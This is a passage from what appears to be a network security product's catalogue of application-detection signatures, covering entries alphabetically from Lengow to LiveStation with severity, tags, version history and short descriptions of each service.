Last changed: sgpkg-ips-1678-5242
Description: Lengow offers a SAAS solution for e-commerce sites to help them centralize, optimize and track the distribution of their product catalogues toward comparison shopping sites, marketplaces, affiliate networks, sponsored links, social networks, etc.
Back to top

Lenovo

About this situation: Lenovo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-1014-5242
Last changed: sgpkg-ips-1764-5242
Description: Lenovo is a Chinese technology company.
Back to top

Less-Accounting

About this situation: Application Less-Accounting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Provide simple accounting workflows to help speed up your bookkeeping tasks.
Back to top

Less-Annoying-CRM

About this situation: Less Annoying CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, manage contacts, track leads, and stay on top of follow-ups.
Back to top

Lessons-Learned-Database

About this situation: Application Lessons-Learned-Database detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Lessons Learned Database helps capture knowledge from important projects, events, operations or training.
Back to top

Letv

About this situation: LeTV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: LeTV offers an online video programs and movie viewing through legal channels. The LeTV is an interactive platform for entertainment databases, providing movies, animations, news and lifestyle information etc.
Back to top

Level-3

About this situation: Level 3 Communications usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Description: Level-3 content delivery network usage has been detected.
Back to top

LeveragePoint-for-Value-Management

About this situation: Application LeveragePoint-for-Value-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The LeveragePoint platform enables everyone in your organization to collaborate and align around creating value for your customers.
Back to top

LexisNexis

About this situation: Application LexisNexis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LexisNexis Group is a corporation providing computer-assisted legal research as well as business research and risk solution services.
Back to top

LexisNexis---Total-Research

About this situation: Application LexisNexis---Total-Research detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LexisNexis is provider of legal research and content-enabled workflow solutions.
Back to top

LG-Cloud

About this situation: LG Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: The LG Cloud Service allows users to access their contents (video, music, pictures) through LG Smart TVs, smartphones, and PCs easily and conveniently anytime anywhere.
Back to top

LG-TV-Service-Delivery-Platform

About this situation: LG TV Service Delivery Platform usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1086-5242
Description: LG TV Service Delivery Platfrom (SDP) is used by television sets manufactured by LG for various smart-tv features, such as installable third party applications.
Back to top

Liaison-Technologies

About this situation: Application Liaison-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Liaison Technologies provides cloud-based data solutions. It allows organizations to meet data challenges while building data-centric foundation.
Back to top

Liberated-Syndication

About this situation: Application Liberated-Syndication detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Libsyn
Back to top

Libero-Video

About this situation: Libero-Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-628-5211
Description: Libero-Video is an Italian web site for sharing video content.
Back to top

LibraryThing

About this situation: Application LibraryThing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LibraryThing is a social cataloging web application for storing and sharing book catalogs and types of book metadata.
Back to top

Librato-Metrics

About this situation: Application Librato-Metrics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Librato provides a complete solution for monitoring and understanding the metrics that impact your business at all levels of the stack. Leveraging their heritage in distributed systems and scalable web applications, the engineering team has built a resilient and scalable platform optimized for time series data analytics, thereby turning a complex problem into an easy to use service.
Back to top

LibreOffice

About this situation: Endpoint Context Agent based LibreOffice
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: LibreOffice endpoint application has been detected.
Back to top

License expires soon

About this situation: License expires soon
Context: Management Server situation
Severity: 4
Tags: SMC
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

Liferay

About this situation: Application Liferay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Liferay Portal is the leading open source portal for the enterprise, offering content management, collaboration, and social out-of-the-box.
Back to top

Lifesize

About this situation: Lifesize usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Lifesize focuses on replicating face-to-face communications through high definition videoconferencing.
Back to top

Liftshare

About this situation: Liftshare usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Liftshare has been responsible for many new friendships and their users reviews help you choose your driver or passenger with confidence.
Back to top

Lightcms

About this situation: LightCMS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: LightCMS provides several tools to do eCommerce, blogs, analytics and several other capabilities. It provides two options for creating websites; either by using an in-built template or by creating your own templates.
Back to top

Lighthouse

About this situation: Application Lighthouse detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lighthouse Software Testing is dedicated to delivering you the Software Outsourcing, Software Testing and Software Quality Assurance you need.
Back to top

Lighthouse-App

About this situation: Lighthouse App usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: helps to collaborate and keep track of your project development with ease.
Back to top

Lightspeed-POS

About this situation: Application Lightspeed-POS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lightspeeds cloud-based POS system is reinventing the customer experience while helping business owners grow their business.
Back to top

Limelight

About this situation: Limelight usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-704-5211
Description: Limelight video streaming and content delivery service usage has been detected.
Back to top

Line

About this situation: Line usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1646-5242
Description: LINE is an instant messaging application majorly targeting mobile devices such as smart phones and tablets. LINE users can communicate with each other with text message and audio/video call, plus the exchange of multimedia content such as photos, videos, voice messages, etc.
Back to top

Line-2

About this situation: Application Line-2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Line 2 - fully-featured 2nd phone line on your cell phone, or network your small business with a complete business phone system
Back to top

Lineage

About this situation: Lineage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that offers a multiplayer, role-playing game. Lineage features 2D isometric-overhead graphics.
Back to top

Linedata

About this situation: Application Linedata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Linedata is a solutions provider with 700 clients operating in 50 countries. With more than 1,000 employees across the globe, we are dedicated to the Investment Management and Credit community.
Back to top

Lingerie and Swimsuit

About this situation: Sites that offer images of models in suggestive but not lewd costume, with semi nudity permitted. Includes classic 'cheesecake, calendar and pinup art and photography. Includes sites offering lingerie or swimwear for sale.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer images of models in suggestive but not lewd costume, with semi nudity permitted. Includes classic 'cheesecake, calendar and pinup art and photography. Includes sites offering lingerie or swimwear for sale.
Back to top

Lingo

About this situation: Application Lingo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lingo is a cloud-based application that is designed for trading process.
Back to top

Lingotek

About this situation: Application Lingotek detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lingotek - The Translation Network is a Utah-based technology company that enables the creation and management of multilingual content inside your enterprise applications.
Back to top

Lingtu

About this situation: Application Lingtu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lingtu is a company with independent intellectual property rights of software products as the core to geospatial data products based on the application to the global positioning technology, GIS, remote sensing, communications and networking support, is committed to providing a wide range of smart city applications platform, LBS positioning information service platform integrated, on-board navigation service platform, electronic map data integration and other integrated solutions and IT services of high-tech private enterprises.
Back to top

LinkConnector

About this situation: Application LinkConnector detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LinkConnector Corporation is an Affiliate Marketing Network whose online application helps online merchants and their affiliates
Back to top

LinkedIn

About this situation: LinkedIn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1769-5242
Description: LinkedIn is a business-oriented social networking site.
Back to top

LinkedIn Connections

About this situation: LinkedIn function that enables a user to add a connection.
Context: URL Application Context
Severity: 1
Tags: Social Web - LinkedIn, Business Usage
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: LinkedIn function that enables a user to add a connection.
Back to top

LinkedIn File Download

About this situation: LinkedIn file download detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description: LinkedIn file download detected. Requires decryption to work.
Back to top

LinkedIn File Upload

About this situation: LinkedIn file upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description: LinkedIn file upload detected. Requires decryption to work.
Back to top

LinkedIn Jobs

About this situation: LinkedIn function that enables a user to perform activities related to job search.
Context: URL Application Context
Severity: 1
Tags: Social Web - LinkedIn, Business Usage
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: LinkedIn function that enables a user to perform activities related to job search.
Back to top

LinkedIn Mail

About this situation: LinkedIn function that enables a user to send an email within the LinkedIn community.
Context: URL Application Context
Severity: 1
Tags: Social Web - LinkedIn, Business Usage
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: LinkedIn function that enables a user to send an email within the LinkedIn community.
Back to top

LinkedIn Updates

About this situation: LinkedIn function that enables a user to edit a profile or post an update.
Context: URL Application Context
Severity: 1
Tags: Social Web - LinkedIn, Business Usage
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: LinkedIn function that enables a user to edit a profile or post an update.
Back to top

LinkedIn-CDN

About this situation: LinkedIn CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1769-5242
Description: LinkedIn's content distribution network site.
Back to top

LinkedIn-Learning

About this situation: LinkedIn Learning usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1772-5242
Description: LinkedIn Learning is a business-oriented online class and learning platform provided by LinkedIn. This system application cannot directly be used for allowing LinkedIn Learning and blocking other LinkedIn usage. If you are looking to allow Linkedin Learning in your network but block other LinkedIn usage, see the Knowledge Base Article https://support.forcepoint.com/s/article/How-to-allow-LinkedIn-Learning-but-block-other-LinkedIn-access .
Back to top

Linkgard

About this situation: Application Linkgard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Linkgard specializes in software development, IT security, and training services. It's also a Google Apps reseller and provide related services. leveraging the core skills mentioned above to bring an unparalled Google Apps experience.
Back to top

LinkShare

About this situation: Application LinkShare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Rakuten LinkShare Corporation provides ecommerce businesses with a range of online marketing services including Affiliate Marketing, Lead Generation, and Search Marketing
Back to top

LinkTrust

About this situation: Application LinkTrust detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LinkTrust allow you keep track of all of your marketing and advertising initiatives
Back to top

Lino

About this situation: Application Lino detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: lino is an online web sticky note service that can be used to post memos, to-do lists, ideas, and photos anywhere on an online web canvas.
Back to top

Linode

About this situation: Application Linode detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Linode is a cloud-hosting provider. Users can then dynamically scale their environments to meet business demands.
Back to top

Linode-Infrastructure

About this situation: Linode Servers usage
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1727-5242
Description: This application signature tracks the host ip addresses referring to Linode servers worldwide.
Back to top

Lintasarta

About this situation: Application Lintasarta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lintasarta is a service provider of data communications, internet and value added solutions for industrial agency, media and communications, finance, manufacturing, resources, services, trading, distribution, and transportation.
Back to top

Lionbridge

About this situation: Application Lionbridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lionbridge
Back to top

Liquid-Motors-Portal

About this situation: Application Liquid-Motors-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Liquid Motors Inc., a offers the automotive industry comprehensive Internet marketing solutions designed to maximize lead generation.
Back to top

Liquid-Web

About this situation: Application Liquid-Web detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Liquid Web is a privately held provider of web hosting services.
Back to top

LiquidFiles

About this situation: Application LiquidFiles detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiquidFiles is a company specialising in helping companies Send and Receive Large Files Securely. By using modern HTML 5 techniques, any size file can be sent and in difference to many solutions.
Back to top

Liquidplanner

About this situation: LiquidPlanner usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: LiquidPlanner is a platform-independent, online project management system which features ranged estimates to express the uncertainty in project schedules. This collaborative software is accessible via modern web browsers and mobile applications for iPhone, iPad, and Android operating system-based devices.
Back to top

LiquidSpace

About this situation: Application LiquidSpace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiquidSpace is a marketplace for workspace, offers the best variety of space types to choose from including meeting rooms, conference space, coworking venues, business centers, hotel lobbies, libraries and private offices to name just a few. LiquidSpace helps mobile professionals find a quiet touchdown workspace, helps start-ups avoid costly long-term leases and offers enterprises flexible work place solutions.
Back to top

Lister-Technologies

About this situation: Application Lister-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lister Technologies is a software services company that offers services to customers in e-commerce, digital marketing, CRM and and analytics.
Back to top

ListHub

About this situation: Application ListHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ListHub is the broadest, most widely adopted network for listing distribution, and works in concert with MLSs, franchises, and core real estate technologies to bring real estate brokerage firms a single dashboard for controlling their online marketing strategy.
Back to top

Listing-Lab

About this situation: Application Listing-Lab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Listing Lab A custom web site builder for commercial real estate.
Back to top

Listography

About this situation: Application Listography detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Listography provides users (listographers) of all ages an easy-to-use tool for creative list writing and sharing.
Back to top

Liteaccounting

About this situation: LiteAccounting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Send professional invoices to your clients directly from LiteAccounting. All of Your invoices are sent as PDFs to correct formatting
Back to top

LiteManager

About this situation: Application LiteManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiteManager - remote access software for remote administration of computers over the Internet or remote control in a local network, for distant learning, providing remote support to users and supervising work activity of employees.
Back to top

LitExtension-Shopping-Cart-Migration-Service

About this situation: Application LitExtension-Shopping-Cart-Migration-Service detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LitExtension is a provider of web based shopping cart migration tools for platforms such as Magento, PrestaShop, and WooCommerce.
Back to top

Litmos-Lms

About this situation: Litmos LMS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Litmos has an learning management system including learning paths, compliance reminders and re-certifications. It provides training for employees, customers or channel partners.
Back to top

Litmus

About this situation: Application Litmus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Litmus is a web-based email creation, testing and analytics platform empowering marketers, designers, and agencies to confidently deliver a superior subscriber experience.
Back to top

Little-Fighter

About this situation: Little Fighter usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Little Fighter is a massively multiplayer online fighting game that is available as freeware, and operates on Windows PCs.
Back to top

Little-Green-Light

About this situation: Application Little-Green-Light detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Little Green Light - web-based donor database is packed with tools to help you successfully manage your constituent relationships and all your fundraising activities in one easy-to-use, affordable system.
Back to top

Live-For-Speed

About this situation: Live for Speed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Live For Speed is an online multiplayer game with racing cars. This application is free and is entirely distributed via the Internet. Source: Wikipedia
Back to top

Live-Healthy-Iowa

About this situation: Application Live-Healthy-Iowa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Live Healthy Iowa, a program of the Iowa Sports Foundation, is a health initiative that brings together friends, families, businesses and communities in team-based wellness challenges designed to promote positive lifestyle change.
Back to top

Live-Meeting

About this situation: Live Meeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application consists of software that users install on a computer, which allows them to connect to a central server to set up and manage web meetings. Source: Wikipedia
Back to top

Live-Online-TV

About this situation: Live Online TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Live-TV-Center

About this situation: Live TV Center usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

Live2Support

About this situation: Application Live2Support detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Live2Support is customizable and flexible online customer chat support software for business to provide online help. Track website visitors in realime.
Back to top

Live365

About this situation: Live365 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1706-5242
Description: Live365 is an Internet radio network where members can create their own online radio station or listen to other Live365 broadcasters' online stations.
Back to top

LiveAgent

About this situation: Application LiveAgent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveAgent Helpdesk Live Chat is a customer service software which solves all of your customer support troubles.
Back to top

LiveBinders

About this situation: Application LiveBinders detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveBinders is a content curation site that, in simple terms, is a 3-ring binder for the web. Educators and students are going paperless by using LiveBinders for assignments, eportfolios. People are using LiveBinders to share great information that they have found on the web or to aggregate that information with their own resources.
Back to top

LiveCart

About this situation: Application LiveCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveCart provides an e-commerce solutions for business.
Back to top

Livechat

About this situation: LiveChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: LiveChat is an online marketing, live support and web analytics application for SMB and large enterprises.
Back to top

Livedoor-Blog

About this situation: Livedoor blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Livedoor-Webmail

About this situation: Livedoor WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Japanese Web based mail.
Back to top

Livedrive

About this situation: Livedrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-630-5211
Description: Livedrive is a cloud storage and online backup service.
Back to top

Livefyre

About this situation: Livefyre service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: Livefyre is a web advertising and statistic collection service.
Back to top

LiveGO

About this situation: LiveGO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Discussion Forum, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-630-5211
Description: LiveGO (former MessengerFX) is a web-based instant messenger service that allows users to connect to MSN, Google Talk, AIM, and Yahoo via a web browser.
Back to top

LiveHelpNow

About this situation: Application LiveHelpNow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveHelpNow provides web based solutions tools to online commerce to improve their service.
Back to top

LiveHive

About this situation: Application LiveHive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveHive is sales engagement platform made for B2B sales professionals so they can share and track sales content.
Back to top

LiveJournal

About this situation: LiveJournal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: LiveJournal is a social media platform where users can share common passions and interests.
Back to top

LiveLeak

About this situation: LiveLeak usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-769-5211
Description: LiveLeak is a video sharing service where users can upload and watch video clips.
Back to top

Livelinks

About this situation: Livelinks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A social networking website focused on dating and voice-chat
Back to top

LiveNetLife

About this situation: Application LiveNetLife detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveNetLife- creates live net life. Connect people who are using similar information in the same moment in time.
Back to top

LiveOffice

About this situation: Application LiveOffice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveOffice is global provider of cloud-based email archiving, email compliance, email discovery and email continuity solutions
Back to top

LiveOffice-Discovery-Archive

About this situation: Application LiveOffice-Discovery-Archive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Discovery Archive is a software-as-a-service (SaaS) solution designed to manage users e-discovery needs.Discovery Archive also helps significantly reduce the time it takes to respond to e-discovery requests, which maximizes your resources and improves overall efficiency.
Back to top

LiveOps

About this situation: Application LiveOps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LiveOps is a cloud-based contact center, virtual call center software with social customer service greatly improves customer service and customer support experience
Back to top

LivePerson

About this situation: LivePerson usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-595-5211
Description: LivePerson is a web-based chat service that is which allows users to send instant messages to customer support using a web browser.
Back to top

LivePlan

About this situation: Application LivePlan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LivePlan simplifies business planning, budgeting, forecasting, and performance tracking for small businesses and startups
Back to top

LiveRail

About this situation: LiveRail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: LiveRail usage detected. LiveRail is an online advertisement and statistics collection service.
Back to top

Liveramp

About this situation: Liveramp content delivery network usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Description: Liveramp content delivery network usage has been detected.
Back to top

LiveStation

About this situation: LiveStation usage detected
Context: Application Context
Severity: 1
